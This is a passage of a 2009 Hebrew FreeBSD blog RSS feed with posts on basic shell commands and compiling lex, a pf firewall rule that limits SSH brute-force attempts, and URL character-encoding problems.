<li>nano &#8211; עורך טקסט פשוט וקל לשימוש. אם רוצים לערוך את הקובץ test.txt אז: nano test.txt יפתח את הקובץ בעורך.</li>
<li>joe &#8211; עורך טקסט שמדגיש קוד.</li>
<li>vi &#8211; עורך טקסט מתקדם.</li>
<li>lynx או links -דפדפן טקסטואלי</li>
<li>wget &#8211; מנהל הורדות, למשל: wget http://www.somesite.com/somefile.zip מוריד את הקובץ.</li>
<li>fetch &#8211; כנ&quot;ל</li>
<li>exit &#8211; יציא מהמעתפת (shell).</li>
<li>^Z &#8211; קונטרול Z &#8211; המקש קונטרול במקלדת ולחיצה על Z &#8211; עצירת (לא הפסקת) התהליך שכרגע רץ מולנו ב-foreground.</li>
<li>^T &#8211; קונטרול T &#8211; מראה באיזה קריאת מערכת נמצא התהליך שרץ מולנו.</li>
<li>^C &#8211; מפסיק את הליך הרץ.</li>
<li>^D &#8211; קונטרול D &#8211; סוף הקובץ EOF. (מסיים קלט, אם במעטפת, אז כמו exit)</li>
<li>jobs &#8211; משימות רצות</li>
<li>fg &#8211; מעביר תהליך מולנו, למשל fg %1 כש 1 הוא המספר של התהליך כמו שjobs החזיר אותו.</li>
<li>bg &#8211; מעביר תהליך לרקע, למשל fg%1</li>
</ul>
<h2>הידור והרצת קובץ lex</h2>
<pre>yury@delta:~&gt; nano test.l
yury@delta:~&gt; lex test.l
yury@delta:~&gt; echo hello world thisINTEGER is some test input &gt; test.txt
yury@delta:~&gt; ./test &lt; test.txt
hello world thisgot INTEGER or integer
 is some test input</pre>
<p>הקובץ lex היה:</p>
<pre>%%</pre>
<pre>integer|INTEGER printf("got INTEGER or integer\n");</pre>
<pre>%%</pre>
<h2>העברת קבצים</h2>
<p>על מנך להעיבר קבצים מהשרת למחשב בבית ניתן להשמשת בפורטקול SFTP או SCP, עם כל תוכנה שתומכת בהם, למשל <a href="http://winscp.net/eng/download.php">WinSCP</a></p>
</div>]]></content:encoded>			<wfw:commentRss>http://www.blog.freebsd.co.il/2009/05/%d7%a2%d7%91%d7%95%d7%93%d7%94-%d7%a2%d7%9d-%d7%a9%d7%a8%d7%aa-freebsd-%d7%9e%d7%a8%d7%95%d7%97%d7%a7/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>&#8235;איך נפטרתי מהסקריפט-קידדיס שעושים bruteforce לsshd&#8236;</title>		<link>http://www.blog.freebsd.co.il/2009/04/%d7%90%d7%99%d7%9a-%d7%a0%d7%a4%d7%98%d7%a8%d7%aa%d7%99-%d7%9e%d7%94%d7%a1%d7%a7%d7%a8%d7%99%d7%a4%d7%98-%d7%a7%d7%99%d7%93%d7%93%d7%99%d7%a1-%d7%a9%d7%a2%d7%95%d7%a9%d7%99%d7%9d-bruteforce-%d7%9csshd/</link>
		<comments>http://www.blog.freebsd.co.il/2009/04/%d7%90%d7%99%d7%9a-%d7%a0%d7%a4%d7%98%d7%a8%d7%aa%d7%99-%d7%9e%d7%94%d7%a1%d7%a7%d7%a8%d7%99%d7%a4%d7%98-%d7%a7%d7%99%d7%93%d7%93%d7%99%d7%a1-%d7%a9%d7%a2%d7%95%d7%a9%d7%99%d7%9d-bruteforce-%d7%9csshd/#comments</comments>
		<pubDate>Fri, 24 Apr 2009 16:13:46 +0000</pubDate>
		<dc:creator>&#8235;יורי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.blog.freebsd.co.il/?p=42</guid>
		<description><![CDATA[&#8235;לוקחים מפה את כל טווחי האיפי בישראל, וחוסמים את כל מה שלא מגיע מישראל. בנוסף אני גם חוסם את מי שמנסה להתחבר יותר מ5 פעמים ב60 שניות table &#60;Israel&#62; file "/path/to/range/of/Israel" . . . pass in log proto tcp from &#60;Israel&#62; to any port ssh flags S/SA synproxy state (max-src-conn 5, max-src-conn-rate 5/60, overload &#60;ABUSERS&#62; [...]&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>לוקחים <a href="http://www.countryipblocks.net/">מפה </a>את כל טווחי האיפי בישראל, וחוסמים את כל מה שלא מגיע מישראל. בנוסף אני גם חוסם את מי שמנסה להתחבר יותר מ5 פעמים ב60 שניות</p>
<pre>table &lt;Israel&gt; file "/path/to/range/of/Israel"
.
.
.</pre>
<pre>pass in log proto tcp from &lt;Israel&gt; to any port ssh flags S/SA synproxy state (max-src-conn 5, max-src-conn-rate 5/60, overload &lt;ABUSERS&gt; flush global)</pre>
</div>]]></content:encoded>			<wfw:commentRss>http://www.blog.freebsd.co.il/2009/04/%d7%90%d7%99%d7%9a-%d7%a0%d7%a4%d7%98%d7%a8%d7%aa%d7%99-%d7%9e%d7%94%d7%a1%d7%a7%d7%a8%d7%99%d7%a4%d7%98-%d7%a7%d7%99%d7%93%d7%93%d7%99%d7%a1-%d7%a9%d7%a2%d7%95%d7%a9%d7%99%d7%9d-bruteforce-%d7%9csshd/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>&#8235;קידודים זה דבר מעצבן&#8236;</title>		<link>http://www.blog.freebsd.co.il/2009/04/%d7%a7%d7%99%d7%93%d7%95%d7%93%d7%99%d7%9d-%d7%96%d7%94-%d7%93%d7%91%d7%a8-%d7%9e%d7%a2%d7%a6%d7%91%d7%9f/</link>
		<comments>http://www.blog.freebsd.co.il/2009/04/%d7%a7%d7%99%d7%93%d7%95%d7%93%d7%99%d7%9d-%d7%96%d7%94-%d7%93%d7%91%d7%a8-%d7%9e%d7%a2%d7%a6%d7%91%d7%9f/#comments</comments>
		<pubDate>Fri, 24 Apr 2009 13:47:26 +0000</pubDate>
		<dc:creator>&#8235;יורי&#8236;</dc:creator>				<category><![CDATA[php]]></category>
		<category><![CDATA[encoding]]></category>
		<category><![CDATA[iconv]]></category>

		<guid isPermaLink="false">http://www.blog.freebsd.co.il/?p=40</guid>
		<description><![CDATA[&#8235;אין ספק שקידודים זה דבר מעצבן, אבל זה הופך להיות עוד קצת יותר מעצבן כשמדובר בכתובות. http://www.freebsd.co.il/test/url/index.php/שלום שומר על המבנה שלו בשורת הכתובת בלי שהייתי צריך לעשות שום דבר, וגם הURL חוזר מצויין אחריי urldecode. אם יש בעיה ישר אחריי שמקישים את הכתובת בדפדן, אני מניח שזה בעיה בטיפול של השרת עצמו בכתובת, האפשרות הכי [...]&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אין ספק שקידודים זה דבר מעצבן, אבל זה הופך להיות עוד קצת יותר מעצבן כשמדובר בכתובות.</p>
<p><a rel="nofollow" href="http://www.freebsd.co.il/test/url/index.php/%D7%A9%D7%9C%D7%95%D7%9D" target="_blank">http://www.freebsd.co.il/test/url/index.php/שלום</a></p>
<p>שומר על המבנה שלו בשורת הכתובת בלי שהייתי צריך לעשות שום דבר, וגם הURL חוזר מצויין אחריי urldecode.<br />
אם יש בעיה ישר אחריי שמקישים את הכתובת בדפדן, אני מניח שזה בעיה בטיפול של השרת עצמו בכתובת, האפשרות הכי הגיונית זה לשנות את הקידוד ברירת מחדל לUTF-8 באמצעות <a href="http://httpd.apache.org/docs/2.0/mod/core.html#adddefaultcharset">AddDefaultCharset</a></p>
<p>הבעייה מתחילה כמשהו שהאתר שלו עדיין בwindows1255 (למה?! למה?!) רוצה לעשות קישור לאתר שלנו ומעתיק את הלינק בדיוק כמו שהוא:<br />
<a rel="nofollow" href="http://www.freebsd.co.il/test/url/win1255.php" target="_blank">http://www.freebsd.co.il/test/url/win1255.php</a><br />
(יש פה שני לינקים, הימני עובד בסדר, השמאלי נדפק )<br />
הלינק הימני כניראה עובר המרה ליוניקוד + urlencode ולכן עובר בסדר, ואילו השמאלי, כניראה בגלל הפרמטר נשאר בקידוד המקורי<br />
ולכן &quot;נדפק&quot;.</p>
<p>בשביל לראות את המקור, החלף סיומת php ב txt</p>
<p><a href="http://www.tapuz.co.il/Forums2008/ViewMsg.aspx?ForumId=312&amp;MessageId=129036556">פורסם במקור בתפוז</a></p>
</div>]]></content:encoded>			<wfw:commentRss>http://www.blog.freebsd.co.il/2009/04/%d7%a7%d7%99%d7%93%d7%95%d7%93%d7%99%d7%9d-%d7%96%d7%94-%d7%93%d7%91%d7%a8-%d7%9e%d7%a2%d7%a6%d7%91%d7%9f/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

